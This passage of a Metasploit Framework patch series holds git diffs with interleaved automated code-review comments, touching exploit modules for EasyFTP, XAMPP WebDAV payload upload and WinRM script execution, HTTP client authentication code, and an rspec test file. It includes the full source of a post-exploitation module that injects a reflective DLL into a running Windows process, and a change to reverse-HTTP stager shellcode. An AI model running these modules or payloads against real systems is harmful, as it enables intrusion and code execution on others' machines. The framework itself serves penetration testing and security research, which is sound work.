a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb 
@@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(8080), - OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), - OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), + OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), + OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']) ], self.class) end diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index c19096b2c8..f5b21a0499 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote [ OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']), OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]), - OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']), - OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp']) + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp']) ], self.class) end @@ -46,12 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = build_path print_status "Uploading Payload to #{uri}" - res,c = send_digest_request_cgi({ + res = send_request_cgi({ 'uri' => uri, 'method' => 'PUT', 'data' => payload.raw, - 'DigestAuthUser' => datastore['RUSER'], - 'DigestAuthPassword' => datastore['RPASS'] + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] }, 25) unless (res and res.code == 201) print_error "Failed to upload file!" 
diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 666ca66d3d..c53314f136 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -66,20 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote @compat_mode = false end - def check - unless accepts_ntlm_auth - print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth" - return Msf::Exploit::CheckCode::Safe - end - - return Msf::Exploit::CheckCode::Vulnerable - end - - def exploit - unless check == Msf::Exploit::CheckCode::Vulnerable - return - end unless valid_login? print_error "Login Failure. Recheck your credentials" return @@ -141,7 +128,7 @@ class Metasploit3 < Msf::Exploit::Remote def temp_dir print_status "Grabbing %TEMP%" - resp,c = send_request_ntlm(winrm_open_shell_msg) + resp = send_winrm_request(winrm_open_shell_msg) if resp.nil? print_error "Got no reply from the server" return nil @@ -152,16 +139,16 @@ class Metasploit3 < Msf::Exploit::Remote end shell_id = winrm_get_shell_id(resp) cmd = "echo %TEMP%" - resp,c = send_request_ntlm(winrm_cmd_msg(cmd, shell_id)) + resp = send_winrm_request(winrm_cmd_msg(cmd, shell_id)) cmd_id = winrm_get_cmd_id(resp) - resp,c = send_request_ntlm(winrm_cmd_recv_msg(shell_id,cmd_id)) + resp = send_winrm_request(winrm_cmd_recv_msg(shell_id,cmd_id)) streams = winrm_get_cmd_streams(resp) return streams['stdout'].chomp end def check_remote_arch wql = %q{select AddressWidth from Win32_Processor where DeviceID="CPU0"} - resp,c = send_request_ntlm(winrm_wql_msg(wql)) + resp = send_winrm_request(winrm_wql_msg(wql)) #Default to x86 if we can't be sure return "x86" if resp.nil? or resp.code != 200 resp_tbl = parse_wql_response(resp) 
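Review bot: In `temp_dir` (hunk `@@ -152,16 +139,16 @@`) only the first `send_winrm_request` result is checked for nil. The replies to `winrm_cmd_msg` and `winrm_cmd_recv_msg` go straight into `winrm_get_cmd_id` and `winrm_get_cmd_streams`, and `streams['stdout'].chomp` assumes a hash came back; whether those helpers tolerate nil is not visible here. The `valid_login?` hunk (`@@ -247,7 +234,7 @@`) has the same gap: `resp.code` is read without a nil check, although the other callers changed in this commit treat a nil reply as a timeout. I would write `return false unless resp && resp.code == 200` there and add `return nil if resp.nil?` after each request in `temp_dir`. Both methods run past the lines shown in their hunks.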
@@ -247,7 +234,7 @@ class Metasploit3 < Msf::Exploit::Remote def valid_login? data = winrm_wql_msg("Select Name,Status from Win32_Service") - resp,c = send_request_ntlm(data) + resp = send_winrm_request(data) unless resp.code == 200 return false end From accd6208433afb177c603ceb8e24efb165c24f6d Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 23:50:30 -0600 Subject: [PATCH 24/87] Clean up pry --- lib/rex/proto/http/client.rb | 9 +++------ 1 file changed, 3 insertions(+), 6 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index ba46142a45..cf2cab885e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -8,8 +8,6 @@ require 'rex/proto/ntlm/constants' require 'rex/proto/ntlm/utils' require 'rex/proto/ntlm/exceptions' -require 'pry' - module Rex module Proto module Http @@ -356,15 +354,14 @@ class Client end end - return res if opts['username'].nil? or opts['username'] = '' + return res if opts['username'].nil? or opts['username'] == '' supported_auths = res.headers['WWW-Authenticate'] if supported_auths.include? 'Basic' if opts['headers'] - opts['headers']['Authorization'] = basic_auth_header(username,password) + opts['headers']['Authorization'] = basic_auth_header(opts['username'],opts['password'] ) else - opts['headers'] = { 'Authorization' => basic_auth_header(username,password)} + opts['headers'] = { 'Authorization' => basic_auth_header(opts['username'],opts['password'] )} end - req = request_cgi(opts) res = _send_recv(req,t,persist) return res From ac50c32d513f10cc71a2960c843c1574384c4810 Mon Sep 17 00:00:00 2001 From: Royce Davis Date: Wed, 20 Feb 2013 10:02:50 -0600 Subject: [PATCH 25/87] Tested, works on server 2k8 --- modules/auxiliary/admin/smb/psexec_command.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/admin/smb/psexec_command.rb b/modules/auxiliary/admin/smb/psexec_command.rb index 54be82308f..7be526fab2 100644 
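Review bot: In the `lib/rex/proto/http/client.rb` hunk, `supported_auths.include? 'Basic'` raises NoMethodError when the response has no `WWW-Authenticate` header, which happens whenever a caller passes `username` and the server does not challenge. The early return guards only the missing username, not the response, so I would add `return res unless res && res.headers['WWW-Authenticate']` before the header is used. The substring match on `Basic` means the credentials are resent in a Basic header, which is only base64-encoded, to any server whose challenge contains that word. A comment should say that callers are expected to use this path over TLS. The enclosing method starts and ends outside the hunk, so an earlier status check may already exist.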
--- a/modules/auxiliary/admin/smb/psexec_command.rb +++ b/modules/auxiliary/admin/smb/psexec_command.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary }, 'Author' => [ - 'Royce @R3dy__ Davis ', + 'Royce Davis @R3dy__ ', ], 'License' => MSF_LICENSE, From 0ea7247a43713b10fe8ec8fe65661eb332b134d9 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 22 Feb 2013 22:05:29 +0000 Subject: [PATCH 26/87] Initial commit --- .../windows/manage/reflective_dll_inject.rb | 98 +++++++++++++++++++ 1 file changed, 98 insertions(+) create mode 100644 modules/post/windows/manage/reflective_dll_inject.rb diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb new file mode 100644 index 0000000000..15e0492006 --- /dev/null +++ b/modules/post/windows/manage/reflective_dll_inject.rb 
@@ -0,0 +1,98 @@ +## +# ## This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# web site for more information on licensing and terms of use. +# http://metasploit.com/ +## + +require 'msf/core' +require 'rex' + +class Metasploit3 < Msf::Post + + def initialize(info={}) + super( update_info( info, + 'Name' => 'Windows Manage Reflective DLL Injection Module', + 'Description' => %q{ + This module will inject into the memory of a process a specified Reflective DLL. + }, + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] + )) + + register_options( + [ + OptPath.new('PATH',[true, 'Reflective DLL to inject into memory of a process.']), + OptInt.new('PID',[true, 'Process Identifier to inject of process to inject payload.']), + ], self.class) + end + + # Run Method for when run command is issued + def run + # syinfo is only on meterpreter sessions + print_status("Running module against #{sysinfo['Computer']}") if not sysinfo.nil? + + dll = '' + offset = nil + begin + File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } + + pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) + + pe.exports.entries.each do |entry| + if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) + offset = pe.rva_to_file_offset( entry.rva ) + break + end + end + + raise "Can't find an exported ReflectiveLoader function!" if offset == 0 + rescue + print_error( "Failed to read and parse Dll file: #{$!}" ) + return + end + + inject_into_pid(dll, datastore['PID'], offset) + end + + def inject_into_pid(pay, pid, offset) + + if offset.nil? + print_error("Reflective Loader offset is nil.") + return + end + + if pay.nil? or pay.empty? + print_error("Invalid DLL.") + return + end + + if pid.nil? 
or pid == 0 + print_error("Invalid PID.") + return + end + + print_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}") + begin + print_status("Opening process #{pid}") + host_process = client.sys.process.open(pid.to_i, PROCESS_ALL_ACCESS) + print_status("Generating payload") + print_status("Allocating memory in procees #{pid}") + mem = host_process.memory.allocate(pay.length + (pay.length % 1024)) + # Ensure memory is set for execution + host_process.memory.protect(mem) + print_status("Allocated memory at address #{"0x%.8x" % mem}, for #{pay.length} bytes") + print_status("Writing the stager into memory...") + host_process.memory.write(mem, pay) + host_process.thread.create(mem+offset, 0) + print_good("Successfully injected payload in to process: #{pid}") + rescue ::Exception => e + print_error("Failed to Inject Payload to #{pid}!") + print_error(e.to_s) + end + end +end + From 15d505f7a9b4367f08a8d1592846f8e00d3a4bf1 Mon Sep 17 00:00:00 2001 From: Meatballs Date: Fri, 22 Feb 2013 22:09:19 +0000 Subject: [PATCH 27/87] Msftidy --- .../windows/manage/reflective_dll_inject.rb | 44 +++++++++---------- 1 file changed, 22 insertions(+), 22 deletions(-) diff --git a/modules/post/windows/manage/reflective_dll_inject.rb b/modules/post/windows/manage/reflective_dll_inject.rb index 15e0492006..ac7d447afe 100644 --- a/modules/post/windows/manage/reflective_dll_inject.rb +++ b/modules/post/windows/manage/reflective_dll_inject.rb 
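Review bot: The status line in `inject_into_pid` interpolates `datastore['DLL_PATH']`, but the only options registered in `initialize` are `PATH` and `PID`, so the message prints an empty path; it should read `datastore['PATH']`. In `run`, `offset` starts as `nil`, so `raise ... if offset == 0` does not fire when no export matches, and the failure is only reported later as "Reflective Loader offset is nil"; `if offset.nil?` states the intent. `rescue ::Exception` in `inject_into_pid` also traps interrupts and exit requests, where `rescue ::StandardError => e` is the usual choice. The bare `rescue` in `run` reports every failure, including an unreadable file, as a parse error.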
@@ -12,15 +12,15 @@ class Metasploit3 < Msf::Post def initialize(info={}) super( update_info( info, - 'Name' => 'Windows Manage Reflective DLL Injection Module', - 'Description' => %q{ + 'Name' => 'Windows Manage Reflective DLL Injection Module', + 'Description' => %q{ This module will inject into the memory of a process a specified Reflective DLL. }, - 'License' => MSF_LICENSE, - 'Author' => [ 'Ben Campbell '], - 'Platform' => [ 'win' ], - 'SessionTypes' => [ 'meterpreter' ], - 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] + 'License' => MSF_LICENSE, + 'Author' => [ 'Ben Campbell '], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ] )) register_options( @@ -37,23 +37,23 @@ class Metasploit3 < Msf::Post dll = '' offset = nil - begin - File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } + begin + File.open( datastore['PATH'], "rb" ) { |f| dll += f.read(f.stat.size) } - pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) + pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) ) - pe.exports.entries.each do |entry| - if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) - offset = pe.rva_to_file_offset( entry.rva ) - break - end - end + pe.exports.entries.each do |entry| + if( entry.name =~ /^\S*ReflectiveLoader\S*/ ) + offset = pe.rva_to_file_offset( entry.rva ) + break + end + end - raise "Can't find an exported ReflectiveLoader function!" if offset == 0 - rescue - print_error( "Failed to read and parse Dll file: #{$!}" ) - return - end + raise "Can't find an exported ReflectiveLoader function!" if offset == 0 + rescue + print_error( "Failed to read and parse Dll file: #{$!}" ) + return + end inject_into_pid(dll, datastore['PID'], offset) end 
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Post print_error("Invalid PID.") return end - + print_status("Injecting #{datastore['DLL_PATH']} into process ID #{pid}") begin print_status("Opening process #{pid}") From 788c96566f86df41f2ad6a820fdf81318bd7d0c6 Mon Sep 17 00:00:00 2001 From: Raphael Mudge Date: Sun, 24 Feb 2013 17:33:00 -0500 Subject: [PATCH 28/87] Allow HTTP stager to work with authenticated proxies The HttpOpenRequest function from WinINet requires the INTERNET_FLAG_KEEP_CONNECTION flag to communicate through an authenticated proxy. From MSDN ( http://tinyurl.com/chwt86j ): "Uses keep-alive semantics, if available, for the connection. This flag is required for Microsoft Network (MSN), NT LAN Manager (NTLM), and other types of authentication." Without this flag, the HTTP stager will fail when faced with a proxy that requires authentication. The Windows HTTPS stager does not have this problem. For HTTP Meterpreter to communicate through an authenticated proxy a separate patch will need to be made to the Meterpreter source code. This is at line 1125 of source/common/core.c in the Meterpreter source code. My motivation for this request is for windows/dllinject/reverse_http to download a DLL even when faced with an authenticated proxy. These changes accomplish this. Test environment: I staged a SmoothWall device with the Advanced Proxy Web Add-on. I enabled Integrated Windows Authentication with a W2K3 DC. I verified the HTTP stager authenticated to and communicated through the proxy by watching the proxy access.log --- .../shellcode/windows/x86/src/block/block_reverse_http.asm | 5 +++-- modules/payloads/stagers/windows/reverse_http.rb | 2 +- 2 files changed, 4 insertions(+), 3 deletions(-) diff --git a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm index 438738a99d..42c717622a 100644 --- a/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm 
+++ b/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm @@ -49,11 +49,12 @@ httpopenrequest: pop ecx xor edx, edx ; NULL push edx ; dwContext (NULL) - push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200) ; dwFlags + push (0x80000000 | 0x04000000 | 0x00200000 | 0x00000200 | 0x00400000) ; dwFlags ;0x80000000 | ; INTERNET_FLAG_RELOAD ;0x04000000 | ; INTERNET_NO_CACHE_WRITE ;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT - ;0x00000200 ; INTERNET_FLAG_NO_UI + ;0x00000200 | ; INTERNET_FLAG_NO_UI + ;0x00400000 ; INTERNET_FLAG_KEEP_CONNECTION push edx ; accept types push edx ; referrer push edx ; version diff --git a/modules/payloads/stagers/windows/reverse_http.rb b/modules/payloads/stagers/windows/reverse_http.rb index 10555580aa..916dc30509 100644 --- a/modules/payloads/stagers/windows/reverse_http.rb +++ b/modules/payloads/stagers/windows/reverse_http.rb @@ -47,7 +47,7 @@ module Metasploit3 "\xFF\xD5\x31\xFF\x57\x57\x57\x57\x6A\x00\x54\x68\x3A\x56\x79\xA7" + "\xFF\xD5\xEB\x4B\x5B\x31\xC9\x51\x51\x6A\x03\x51\x51\x68\x5C\x11" + "\x00\x00\x53\x50\x68\x57\x89\x9F\xC6\xFF\xD5\xEB\x34\x59\x31\xD2" + - "\x52\x68\x00\x02\x20\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" + + "\x52\x68\x00\x02\x60\x84\x52\x52\x52\x51\x52\x50\x68\xEB\x55\x2E" + "\x3B\xFF\xD5\x89\xC6\x6A\x10\x5B\x31\xFF\x57\x57\x57\x57\x56\x68" + "\x2D\x06\x18\x7B\xFF\xD5\x85\xC0\x75\x1A\x4B\x74\x10\xEB\xE9\xEB" + "\x49\xE8\xC7\xFF\xFF\xFF\x2F\x31\x32\x33\x34\x35\x00\x68\xF0\xB5" + From 1ce86b7adb34e8d35b5ca72a670f62867961921e Mon Sep 17 00:00:00 2001 From: James Lee Date: Mon, 25 Feb 2013 14:29:10 -0600 Subject: [PATCH 29/87] Whitespace --- lib/rex/proto/http/client.rb | 8 ++++---- lib/rex/proto/http/client_request.rb | 6 +++--- modules/auxiliary/scanner/http/http_login.rb | 4 ++-- spec/lib/rex/proto/http/client_spec.rb | 2 +- 4 files changed, 10 insertions(+), 10 deletions(-) diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index cf2cab885e..b2962369ca 100644 
--- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -169,7 +169,7 @@ class Client # # @return [Request] def request_raw(opts={}) - opts['agent'] ||= config['agent'] + opts['agent'] ||= config['agent'] opts['data'] ||= '' opts['uri'] ||= '/' opts['cookie'] ||= config['cookie'] @@ -179,7 +179,7 @@ class Client opts['method'] ||= 'GET' opts['proto'] ||= 'HTTP' opts['query'] ||= '' - + opts['cgi'] = false opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' @@ -221,12 +221,12 @@ class Client opts['ctype'] ||= 'application/x-www-form-urlencoded' opts['vars_get'] ||= {} opts['vars_post'] ||= {} - + opts['cgi'] = true opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' opts['raw_headers'] = opts['raw_headers'] || config['raw_headers'] || '' - opts['version'] = opts['version'] || config['version'] || '1.1' + opts['version'] = opts['version'] || config['version'] || '1.1' opts['client_config'] = self.config diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 9c87834499..d307453b40 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -118,9 +118,9 @@ class ClientRequest if encode req << set_encode_uri(uri_str) else - req << uri_str + req << uri_str end - + if (qstr.length > 0) req << '?' @@ -456,4 +456,4 @@ end end end -end \ No newline at end of file +end diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 4324e312f2..40446f68db 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb 
@@ -116,10 +116,10 @@ class Metasploit3 < Msf::Auxiliary def do_login(user='admin', pass='admin') vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") - + response = do_http_login(user,pass) result = determine_result(response) - + if result == :success print_good("#{target_url} - Successful login '#{user}' : '#{pass}'") diff --git a/spec/lib/rex/proto/http/client_spec.rb b/spec/lib/rex/proto/http/client_spec.rb index 28cb3bb245..937130a1f4 100644 --- a/spec/lib/rex/proto/http/client_spec.rb +++ b/spec/lib/rex/proto/http/client_spec.rb @@ -132,7 +132,7 @@ describe Rex::Proto::Http::Client do # These set_ methods all exercise the evasion opts, looks like it "should set and return the URI", :pending => excuse_lazy(:set_uri) do - + end it "should set and return the CGI", :pending => excuse_lazy(:set_cgi) do From c104fa6d979b1eca2bdc960df67544bfb848ed65 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 26 Feb 2013 11:01:16 -0600 Subject: [PATCH 30/87] Add spec and a few fixes for set_uri --- lib/rex/proto/http/client.rb | 4 +- lib/rex/proto/http/client_request.rb | 14 +- .../lib/rex/proto/http/client_request_spec.rb | 184 ++++++++++++++++++ 3 files changed, 195 insertions(+), 7 deletions(-) create mode 100644 spec/lib/rex/proto/http/client_request_spec.rb diff --git a/lib/rex/proto/http/client.rb b/lib/rex/proto/http/client.rb index cf2cab885e..22ace0507e 100644 --- a/lib/rex/proto/http/client.rb +++ b/lib/rex/proto/http/client.rb @@ -179,7 +179,8 @@ class Client opts['method'] ||= 'GET' opts['proto'] ||= 'HTTP' opts['query'] ||= '' - + + opts['ssl'] = self.ssl opts['cgi'] = false opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' @@ -222,6 +223,7 @@ class Client opts['vars_get'] ||= {} opts['vars_post'] ||= {} + opts['ssl'] = self.ssl opts['cgi'] = true opts['port'] = self.port opts['basic_auth'] = opts['basic_auth'] || config['basic_auth'] || '' 
diff --git a/lib/rex/proto/http/client_request.rb b/lib/rex/proto/http/client_request.rb index 9c87834499..b5fc283ac8 100644 --- a/lib/rex/proto/http/client_request.rb +++ b/lib/rex/proto/http/client_request.rb @@ -26,6 +26,7 @@ class ClientRequest attr_accessor :protocol attr_accessor :query attr_accessor :raw_headers + attr_accessor :ssl attr_accessor :uri attr_accessor :user_agent attr_accessor :vars_get @@ -36,7 +37,7 @@ class ClientRequest def initialize(opts={}) @cgi = opts['cgi'] - @config = opts['client_config'] + @config = opts['client_config'] || {} @connection = opts['connection'] @content_type = opts['ctype'] @cookie = opts['cookie'] @@ -50,6 +51,7 @@ class ClientRequest @port = opts['port'] @protocol = opts['proto'] @query = opts['query'] + @ssl = opts['ssl'] || false @raw_headers = opts['raw_headers'] @uri = opts['uri'] @user_agent = opts['agent'] @@ -160,7 +162,7 @@ class ClientRequest end def set_uri - uri_str = uri + uri_str = uri.dup if (config['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end @@ -179,7 +181,7 @@ class ClientRequest end if (config['uri_full_url']) - url = self.ssl ? "https" : "http" + url = self.ssl ? "https://" : "http://" url << self.config['vhost'] url << ((self.port == 80) ? "" : ":#{self.port}") url << uri_str @@ -190,7 +192,7 @@ class ClientRequest end def set_cgi - uri_str = uri + uri_str = uri.dup if (config['uri_dir_self_reference']) uri_str.gsub!('/', '/./') end @@ -221,7 +223,7 @@ class ClientRequest end def set_encode_uri(str) - a = str + a = str.dup config['uri_encode_count'].times { a = Rex::Text.uri_encode(a, config['uri_encode_mode']) } @@ -229,7 +231,7 @@ class ClientRequest end def set_method - ret = method + ret = method.dup if (config['method_random_valid']) ret = ['GET', 'POST', 'HEAD'][rand(3)] diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb new file mode 100644 index 0000000000..894b5d9792 --- /dev/null 
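Review bot: In the `set_uri` hunk (`@@ -179,7 +181,7 @@`) the scheme now follows `self.ssl`, but the next line still omits the port only when it equals 80. An SSL request on 443 is therefore written as `https://host:443/...`, and an SSL request on port 80 loses its port and reads as 443. Make the default scheme-aware: `default_port = self.ssl ? 443 : 80` followed by `url << ((self.port == default_port) ? "" : ":#{self.port}")`. The same block appends `config['vhost']` verbatim, so an IPv6 vhost produces an unbracketed authority; the bracket handling in `set_host_header` could be reused here. The body of `set_uri` continues outside the hunk.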
+++ b/spec/lib/rex/proto/http/client_request_spec.rb 
@@ -0,0 +1,184 @@ +require 'spec_helper' + +require 'rex/proto/http/client_request' + +shared_context "with 'uri_dir_self_reference'" do + before(:all) do + client_request.config['uri_dir_self_reference'] = true + end + + describe "#set_uri" do + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/./" + end + end +end + +shared_context "with no evasions" do + before(:all) do + client_request.config['uri_dir_self_reference'] = false + client_request.config['uri_fake_params_start'] = false + client_request.config['uri_full_url'] = false + end + + describe "#set_uri" do + it "should return the unmodified uri" do + client_request.send(:set_uri).should == "/" + end + end +end + +shared_context "with 'uri_full_url'" do + + before(:all) do + client_request.config['uri_full_url'] = true + end + + before(:each) do + client_request.config['vhost'] = host + end + + context "with ipv4 host" do + let(:host) { '192.0.2.1' } + + it_behaves_like "uri_full_url" + end + + context "with ipv6 host" do + let(:host) { '2001:DB8::1' } + #before(:each) do + # client_request.config['vhost'] = "[#{host}]" + #end + + it_behaves_like "uri_full_url" + end + + context "with dns host" do + let(:host) { 'www.example.com' } + + it_behaves_like "uri_full_url" + end + +end + +shared_examples "uri_full_url" do + + it "should have the host in the URI" do + client_request.send(:set_uri).should start_with("http://#{host}/") + end + +end + + +describe Rex::Proto::Http::ClientRequest do + + default_options = { + # All of these should be what you get when you pass in empty + # options, but of course that would make it too easy + 'uri' => '/', + 'method' => "GET", + 'proto' => "HTTP", + 'connection' => "close", + 'version' => "1.1", + 'port' => 80, + } + + [ + [ "with reasonable default options", + default_options.merge({ + 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", + # Yes, vhost is in the config. There is no godly reason why this + # should be so. 
+ 'client_config' => { 'vhost' => 'www.example.com', }, + }), + { + :set_cgi => { :result => "/" }, + :set_uri => { :result => "/" }, + :set_method => { :result => "GET" }, + :set_version => { :result => "HTTP/1.1\r\n" }, + :set_uri_prepend => { :result => "" }, + :set_uri_append => { :result => "" }, + :set_agent_header => { :result => "User-Agent: Mozilla/4.0 (compatible; Metasploit RSPEC)\r\n" }, + :set_host_header => { :result => "Host: www.example.com\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar"], :result => "Foo: Bar\r\n" }, + :set_formatted_header => { :args => ["foo", "Bar"], :result => "foo: Bar\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar\twith\ttabs"], :result => "Foo: Bar\twith\ttabs\r\n" }, + :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs: Bar\r\n" }, + } + ], + + [ "with header folding", + default_options.merge({ + 'agent' => "Mozilla/4.0 (compatible; Metasploit RSPEC)", + 'client_config' => { 'header_folding' => true, } + }), + { + :set_uri => { :result => "/" }, + :set_method => { :result => "GET" }, + :set_version => { :result => "HTTP/1.1\r\n" }, + :set_agent_header => { :result => "User-Agent:\r\n\tMozilla/4.0 (compatible; Metasploit RSPEC)\r\n" }, + :set_cookie_header => { :result => "" }, + :set_connection_header => { :result => "Connection:\r\n\tclose\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar"], :result => "Foo:\r\n\tBar\r\n" }, + :set_formatted_header => { :args => ["foo", "Bar"], :result => "foo:\r\n\tBar\r\n" }, + :set_formatted_header => { :args => ["Foo", "Bar\twith\ttabs"], :result => "Foo:\r\n\tBar\twith\ttabs\r\n" }, + :set_formatted_header => { :args => ["Foo\twith\tabs", "Bar"], :result => "Foo\twith\tabs:\r\n\tBar\r\n" }, + } + ], + + [ "with ipv6 host", + default_options.merge({ + 'client_config' => { 'vhost' => "2001:DB8::1" }, + }), + { + :set_host_header => { :result => "Host: [2001:DB8::1]\r\n" }, + } + ], + + [ "with ipv6 host and 
non-default port", + default_options.merge({ + 'port' => 1234, + 'client_config' => { 'vhost' => "2001:DB8::1" }, + }), + { + :set_host_header => { :result => "Host: [2001:DB8::1]:1234\r\n" }, + } + ] + ].each do |c, opts, expectations| + context c do + subject(:client_request) { Rex::Proto::Http::ClientRequest.new(opts) } + + expectations.each do |meth, things| + args = things[:args] || [] + result = things[:result] + describe "##{meth}" do + it "should return #{result.inspect}" do + client_request.send(meth, *args).should == result + end + end + end + + end + end + + subject(:client_request) { Rex::Proto::Http::ClientRequest.new(default_options) } + + context "with GET paramaters" do + subject(:client_request) { + options_with_params = default_options.merge({ + 'vars_get' => { + 'foo[]' => 'bar', + 'foo[]' => 'baz', + } + }) + Rex::Proto::Http::ClientRequest.new(options_with_params) + } + end + + describe "#set_uri" do + it_behaves_like "with 'uri_full_url'" + it_behaves_like "with 'uri_dir_self_reference'" + it_behaves_like "with no evasions" + end + +end \ No newline at end of file From cae030ccd72bf7065eb9c204cec47fc8fc35258c Mon Sep 17 00:00:00 2001 From: James Lee Date: Tue, 26 Feb 2013 13:25:37 -0600 Subject: [PATCH 31/87] Whitespace --- .../lib/rex/proto/http/client_request_spec.rb | 86 ++++++++++--------- 1 file changed, 46 insertions(+), 40 deletions(-) diff --git a/spec/lib/rex/proto/http/client_request_spec.rb b/spec/lib/rex/proto/http/client_request_spec.rb index 894b5d9792..c5ac25a5ca 100644 --- a/spec/lib/rex/proto/http/client_request_spec.rb +++ b/spec/lib/rex/proto/http/client_request_spec.rb 
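Review bot: The expectation tables in this new spec repeat the `:set_formatted_header` key four times inside one hash literal, and Ruby keeps only the last value for a repeated key. Only the `"Foo\twith\tabs"` case is ever turned into an example in each context; the other three are silently dropped. Make each table an array of pairs, e.g. `[:set_formatted_header, { :args => ["Foo", "Bar"], :result => "Foo: Bar\r\n" }],`, which the existing `expectations.each do |meth, things|` loop destructures unchanged. The `vars_get` hash in the "with GET paramaters" context repeats `'foo[]'` the same way, so only `'baz'` survives. Separately, the example under `with 'uri_dir_self_reference'` is titled "should return the unmodified uri" while asserting `"/./"`; a title such as `it "should insert self-referencing directories"` would match what it checks.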
@@ -1,77 +1,77 @@ require 'spec_helper' - + require 'rex/proto/http/client_request' - + shared_context "with 'uri_dir_self_reference'" do before(:all) do client_request.config['uri_dir_self_reference'] = true end - + describe "#set_uri" do it "should return the unmodified uri" do client_request.send(:set_uri).should == "/./" end end end - + shared_context "with no evasions" do before(:all) do client_request.config['uri_dir_self_reference'] = false client_request.config['uri_fake_params_start'] = false client_request.config['uri_full_url'] = false end - + describe "#set_uri" do it "should return the unmodified uri" do client_request.send(:set_uri).should == "/" end end end - + shared_context "with 'uri_full_url'" do - + before(:all) do client_request.config['uri_full_url'] = true end - + before(:each) do client_request.config['vhost'] = host end - + context "with ipv4 host" do let(:host) { '192.0.2.1' } - + it_behaves_like "uri_full_url" end - + context "with ipv6 host" do let(:host) { '2001:DB8::1' } #before(:each) do # client_request.config['vhost'] = "[#{host}]" #end - + it_behaves_like "uri_full_url" end - + context "with dns host" do let(:host) { 